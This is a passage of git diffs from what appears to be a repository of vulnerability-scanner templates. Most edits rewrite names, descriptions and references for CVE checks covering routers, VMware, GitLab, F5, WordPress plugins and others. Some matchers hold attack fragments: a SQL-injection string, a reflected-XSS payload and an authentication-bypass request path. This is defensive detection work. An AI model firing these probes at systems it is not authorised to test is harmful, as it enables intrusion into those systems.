possible for an unauthenticated, malicious actor to force change the admin password due to a hidden - administrative command. + description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 @@ -51,4 +50,5 @@ requests: words: - "text/html" -# Enhanced by cs on 2022/02/25 + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-20167.yaml b/cves/2021/CVE-2021-20167.yaml index e7a72fdc18..6c5bbd9f69 100644 --- a/cves/2021/CVE-2021-20167.yaml +++ b/cves/2021/CVE-2021-20167.yaml @@ -1,12 +1,10 @@ id: CVE-2021-20167 info: - name: Netgear RAX43 - Unauthenticated Command Injection / Authentication Bypass Buffer Overrun via LAN Interface + name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun author: gy741 severity: critical - description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. - Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination - of CVE-2021-20166 and CVE-2021-20167.' + description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.' reference: - https://www.tenable.com/security/research/tra-2021-55 - https://nvd.nist.gov/vuln/detail/CVE-2021-20166 @@ -34,4 +32,4 @@ requests: words: - "http" -# Enhanced by cs on 2022/02/22 +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-20837.yaml b/cves/2021/CVE-2021-20837.yaml index 215b5a96a8..8433e63c9d 100644 --- a/cves/2021/CVE-2021-20837.yaml +++ b/cves/2021/CVE-2021-20837.yaml @@ -1,11 +1,10 @@ id: CVE-2021-20837 info: - name: Unauthenticated RCE In MovableType + name: MovableType - Remote Command Injection author: dhiyaneshDK,hackergautam severity: critical - description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced - 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. + description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. reference: - https://nemesis.sh/posts/movable-type-0day/ - https://github.com/ghost-nemesis/cve-2021-20837-poc @@ -52,4 +51,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index 59e8064b4e..0781db97d3 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -1,11 +1,10 @@ id: CVE-2021-21307 info: - name: Remote Code Exploit in Lucee Admin + name: Lucee Admin - Remote Code Execution author: dhiyaneshDk severity: critical - description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated - remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator. + description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability. reference: - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md @@ -15,6 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 + remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator. tags: cve,cve2021,rce,lucee,adobe requests: @@ -83,4 +83,6 @@ requests: extractors: - type: regex regex: - - "(u|g)id=.*" \ No newline at end of file + - "(u|g)id=.*" + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index b22cebd6c2..935dd92f63 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -1,14 +1,15 @@ id: CVE-2021-21479 info: - name: SCIMono < v0.0.19 Remote Code Execution + name: SCIMono <0.0.19 - Remote Code Execution author: dwisiswant0 severity: critical description: | - In SCIMono before 0.0.19, it is possible for an attacker to inject and - execute java expression compromising the availability and integrity of the system. + SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and + execute java expressions and compromise the availability and integrity of the system. reference: - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-21479 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 @@ -30,3 +31,5 @@ requests: - '"status" : "400"' part: body condition: and + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-21881.yaml b/cves/2021/CVE-2021-21881.yaml index 367e84dfbd..4dc66dd082 100644 --- a/cves/2021/CVE-2021-21881.yaml +++ b/cves/2021/CVE-2021-21881.yaml @@ -1,11 +1,10 @@ id: CVE-2021-21881 info: - name: Lantronix PremierWave 2050 - Remote Code Execution + name: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection author: gy741 severity: critical - description: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command - execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. + description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325 - https://nvd.nist.gov/vuln/detail/CVE-2021-21881 @@ -39,3 +38,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index cb5f7bc8ff..729343b765 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -1,12 +1,13 @@ id: CVE-2021-21972 info: - name: VMware vCenter Unauthenticated RCE + name: VMware vSphere Client (HTML5) - Remote Code Execution author: dwisiswant0 severity: critical - description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin. + description: "VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2)." reference: - https://swarm.ptsecurity.com/unauth-rce-vmware/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-21972 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -32,3 +33,5 @@ requests: regex: - "(Install|Config) Final Progress" part: body + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml index d8d17049e1..4f23f36fb6 100644 --- a/cves/2021/CVE-2021-21978.yaml +++ b/cves/2021/CVE-2021-21978.yaml @@ -1,16 +1,16 @@ id: CVE-2021-21978 info: - name: VMware View Planner Unauthenticated RCE + name: VMware View Planner <4.6 SP1- Remote Code Execution author: dwisiswant0 severity: critical description: | - This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability. - Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. + VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. reference: - https://twitter.com/osama_hroot/status/1367258907601698816 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21978 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -47,4 +47,6 @@ requests: part: body - type: dsl dsl: - - "len(body) == 28" # length of "\nFile uploaded successfully." \ No newline at end of file + - "len(body) == 28" # length of "\nFile uploaded successfully." + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index 60e6518566..303389b8c8 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -1,15 +1,15 @@ id: CVE-2021-21985 info: - name: VMware vSphere Client (HTML5) RCE + name: VMware vSphere Client (HTML5) - Remote Code Execution author: D0rkerDevil severity: critical description: | The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC + - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -32,3 +32,5 @@ requests: words: - '{"result":{"isDisconnected":' part: body + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-22005.yaml b/cves/2021/CVE-2021-22005.yaml index 12f9e4770e..12606d2108 100644 --- a/cves/2021/CVE-2021-22005.yaml +++ b/cves/2021/CVE-2021-22005.yaml @@ -1,15 +1,15 @@ id: CVE-2021-22005 info: - name: VMware vCenter Server file upload vulnerability + name: VMware vCenter Server - Arbitrary File Upload author: PR3R00T severity: critical - description: The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 - base score of 9.8. + description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. reference: - https://kb.vmware.com/s/article/85717 - https://www.vmware.com/security/advisories/VMSA-2021-0020.html - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq + - https://nvd.nist.gov/vuln/detail/CVE-2021-22005 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -39,3 +39,5 @@ requests: - "contains(body_1, 'VMware vSphere')" - "content_length_2 == 0" condition: and + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-22205.yaml b/cves/2021/CVE-2021-22205.yaml index ff871767a7..c21a8a975b 100644 --- a/cves/2021/CVE-2021-22205.yaml +++ b/cves/2021/CVE-2021-22205.yaml @@ -1,12 +1,10 @@ id: CVE-2021-22205 info: - name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection + name: GitLab CE/EE - Remote Code Execution author: GitLab Red Team severity: critical - description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command - execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated - requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. + description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. reference: - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196 @@ -129,4 +127,6 @@ requests: - type: regex group: 1 regex: - - '(?:application-)(\S{64})(?:\.css)' \ No newline at end of file + - '(?:application-)(\S{64})(?:\.css)' + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml index 538a1c7ff0..08212fc078 100644 --- a/cves/2021/CVE-2021-22986.yaml +++ b/cves/2021/CVE-2021-22986.yaml @@ -1,10 +1,10 @@ id: CVE-2021-22986 info: - name: F5 BIG-IP iControl REST Unauthenticated Remote Command Execution + name: F5 BIG-IP iControl REST - Remote Command Execution author: rootxharsh,iamnoooob severity: critical - description: The F5 BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability. + description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability. reference: - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 - https://support.f5.com/csp/article/K03009991 @@ -57,4 +57,4 @@ requests: - "uid=" condition: and -# Enhanced by mp on 2022/04/13 +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 7cb6baeb9a..7bb6a367cd 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -1,13 +1,11 @@ id: CVE-2021-24285 info: - name: Car Seller - Auto Classifieds Script WordPress plugin SQLI + name: WordPress Car Seller - Auto Classifieds Script - SQL Injection author: ShreyaPohekar severity: critical - description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate - or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue. + description: "The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue." reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 classification: @@ -36,3 +34,5 @@ requests: words: - "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq" part: body + +# Enhanced by mp on 2022/05/05 diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml index 0cdc723de1..9bbf1caed5 100644 --- a/cves/2021/CVE-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -1,13 +1,13 @@ id: CVE-2021-24472 info: - name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF + name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery author: Suman_Kar severity: critical - description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this - would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. + description: Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery. reference: - https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24472 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -32,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/05 diff --git a/misconfiguration/proxy/open-proxy-portscan.yaml b/misconfiguration/proxy/open-proxy-portscan.yaml index cf9dc0cbc4..c9fcc1f063 100644 --- a/misconfiguration/proxy/open-proxy-portscan.yaml +++ b/misconfiguration/proxy/open-proxy-portscan.yaml @@ -61,4 +61,4 @@ requests: - (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6)) - (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8))) -# Updated by Chris on 2022/01/21 +# Enhanced by cs on 2022/01/21 From 618cac0e0d85eb60601008ab5972aac090f4e8a0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 16:13:12 +0000 Subject: [PATCH 092/115] Auto Generated New Template Addition List [Mon May 9 16:13:11 UTC 2022] :robot: --- .new-additions | 5 ----- 1 file changed, 5 deletions(-) diff --git a/.new-additions b/.new-additions index 877f0851e2..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +0,0 @@ -cves/2017/CVE-2017-11512.yaml -cves/2019/CVE-2019-12962.yaml -cves/2021/CVE-2021-37416.yaml -cves/2022/CVE-2022-1388.yaml -default-logins/others/panabit-ixcache-default-login.yaml From 73e289527dd466625ae7d182b338311f9c9bc760 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Mon, 9 May 2022 12:16:12 -0400 Subject: [PATCH 093/115] Dashboard Content Enhancements (#4339) * Spacing issues --- cves/2019/CVE-2019-19781.yaml | 1 - cves/2019/CVE-2019-2579.yaml | 2 +- cves/2019/CVE-2019-9618.yaml | 1 - cves/2019/CVE-2019-9670.yaml | 1 - cves/2020/CVE-2020-11034.yaml | 1 - cves/2020/CVE-2020-11529.yaml | 1 - cves/2020/CVE-2020-12116.yaml | 1 - cves/2021/CVE-2021-20158.yaml | 1 - 8 files changed, 1 insertion(+), 8 deletions(-) diff --git a/cves/2019/CVE-2019-19781.yaml b/cves/2019/CVE-2019-19781.yaml index acdf7ca311..af21225a19 100644 --- a/cves/2019/CVE-2019-19781.yaml +++ b/cves/2019/CVE-2019-19781.yaml @@ -30,5 +30,4 @@ requests: words: - "[global]" - # Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-2579.yaml b/cves/2019/CVE-2019-2579.yaml index f39f189ff5..55aa825005 100644 --- a/cves/2019/CVE-2019-2579.yaml +++ b/cves/2019/CVE-2019-2579.yaml @@ -42,7 +42,7 @@ requests: matchers: - type: word words: - - "value='' and '1'='0 --" + - "value='' and '1'='0 --" - "Use this utility to view and manage URLs" condition: and diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index e49130eb92..d2563f9e28 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -33,5 +33,4 @@ requests: - 200 - 500 - # Enhanced by mp on 2022/05/03 diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml index 8d9b7fa04e..a9aa70d3a2 100644 --- a/cves/2019/CVE-2019-9670.yaml +++ b/cves/2019/CVE-2019-9670.yaml @@ -50,5 +50,4 @@ requests: status: - 503 - # Enhanced by mp on 2022/05/03 diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index 2e1267d2fc..efb62f4314 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -30,5 +30,4 @@ requests: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' part: header - # Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml index 2ed820eff0..e9dd64648a 100644 --- a/cves/2020/CVE-2020-11529.yaml +++ b/cves/2020/CVE-2020-11529.yaml @@ -27,5 +27,4 @@ requests: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' part: header - # Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml index 8277b5543e..2aef7ea0b4 100644 --- a/cves/2020/CVE-2020-12116.yaml +++ b/cves/2020/CVE-2020-12116.yaml @@ -48,5 +48,4 @@ requests: - 'status_code_2 == 200' condition: and - # Enhanced by mp on 2022/05/04 diff --git a/cves/2021/CVE-2021-20158.yaml b/cves/2021/CVE-2021-20158.yaml index a3f58fab9b..2a1289ad04 100644 --- a/cves/2021/CVE-2021-20158.yaml +++ b/cves/2021/CVE-2021-20158.yaml @@ -50,5 +50,4 @@ requests: words: - "text/html" - # Enhanced by mp on 2022/05/05 From a9183f3601b84f659b279fb1549f36acd23ca6be Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 22:31:59 +0530 Subject: [PATCH 095/115] Update CVE-2022-29548.yaml --- cves/2022/CVE-2022-29548.yaml | 26 ++++++++++++++------------ 1 file changed, 14 insertions(+), 12 deletions(-) diff --git a/cves/2022/CVE-2022-29548.yaml b/cves/2022/CVE-2022-29548.yaml index 8f733faedf..22a912ae8a 100644 --- a/cves/2022/CVE-2022-29548.yaml +++ b/cves/2022/CVE-2022-29548.yaml @@ -4,18 +4,20 @@ info: name: WSO2 Management Console - Reflected XSS author: edoardottt severity: medium - description: A reflected XSS issue exists in the Management Console of several WSO2 products. + description: | + A reflected XSS issue exists in the Management Console of several WSO2 products. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-29548 cwe-id: CWE-79 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 - tags: cve,cve2022,wso2,xss metadata: + verified: true google-dork: inurl:"carbon/admin/login" + tags: cve,cve2022,wso2,xss requests: - method: GET @@ -24,16 +26,16 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" - type: word part: header words: - "text/html" - - type: word - part: body - words: - - "CARBON.showWarningDialog('???');alert(document.domain)//???" \ No newline at end of file + - type: status + status: + - 200 From 2166acaee6aa58447d304175c2c25c7f7e50fb91 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 22:38:16 +0530 Subject: [PATCH 096/115] Update panabit-default-login.yaml --- default-logins/panabit/panabit-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/panabit/panabit-default-login.yaml b/default-logins/panabit/panabit-default-login.yaml index 00c307ff50..41b1eb6bb4 100644 --- a/default-logins/panabit/panabit-default-login.yaml +++ b/default-logins/panabit/panabit-default-login.yaml @@ -48,10 +48,10 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - '' - 'urn:schemas-microsoft-com:vml' - part: body condition: and - type: word From a1165d92f33014f9cf59dd210872e5b0e18f49e3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 17:08:24 +0000 Subject: [PATCH 097/115] Auto Generated New Template Addition List [Mon May 9 17:08:24 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..3b6e6ac776 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +cves/2022/CVE-2022-29548.yaml From 6f44ff5f6a2263e5f5f91f81b2117c63215f369e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 22:51:50 +0530 Subject: [PATCH 098/115] Update CVE-2022-1040.yaml --- cves/2022/CVE-2022-1040.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-1040.yaml b/cves/2022/CVE-2022-1040.yaml index 0905fda868..e7f6c2559f 100644 --- a/cves/2022/CVE-2022-1040.yaml +++ b/cves/2022/CVE-2022-1040.yaml @@ -1,27 +1,29 @@ id: CVE-2022-1040 info: - name: Sophos Firewall RCE + name: Sophos Firewall - RCE author: For3stCo1d severity: critical - description: An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older. + description: | + An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older. reference: - https://github.com/killvxk/CVE-2022-1040 - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 - metadata: - shodan-query: http.title:"Sophos" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 9.8 cve-id: CVE-2022-1040 cwe-id: CWE-287 - tags: cve,cve2022,sophos,firewall + metadata: + shodan-query: http.title:"Sophos" + tags: cve,cve2022,sophos,firewall,auth-bypass requests: - method: POST path: - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" + headers: X-Requested-With: "XMLHttpRequest" From b46d5b74404fb1b76f61fb3b19f5d0d1bf15b877 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 22:53:52 +0530 Subject: [PATCH 099/115] Update CVE-2022-1040.yaml --- cves/2022/CVE-2022-1040.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-1040.yaml b/cves/2022/CVE-2022-1040.yaml index e7f6c2559f..6edc4ffd3d 100644 --- a/cves/2022/CVE-2022-1040.yaml +++ b/cves/2022/CVE-2022-1040.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-1040 cwe-id: CWE-287 metadata: + verified: true shodan-query: http.title:"Sophos" tags: cve,cve2022,sophos,firewall,auth-bypass From 35d8ce85f74f17db7b379e1a711fcf043dbcc599 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 17:26:02 +0000 Subject: [PATCH 100/115] Auto Generated New Template Addition List [Mon May 9 17:26:02 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3b6e6ac776..fc98efdc01 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +cves/2022/CVE-2022-1040.yaml cves/2022/CVE-2022-29548.yaml From d05c7052e98471f274858bc4e9f863b52ea18e04 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 10 May 2022 03:05:15 -0400 Subject: [PATCH 102/115] Restoring Empty Lines (#4340) * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-34621.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-35464.yaml by mp * Enhancement: cves/2021/CVE-2021-35587.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Spacing and spelling * remove blank lines introduced by dashboard * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-18818.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-3396.yaml by mp * Enhancement: cves/2019/CVE-2019-3929.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-7238.yaml by mp * Enhancement: cves/2019/CVE-2019-7256.yaml by mp * Enhancement: cves/2019/CVE-2019-7609.yaml by mp * Enhancement: cves/2019/CVE-2019-8982.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: 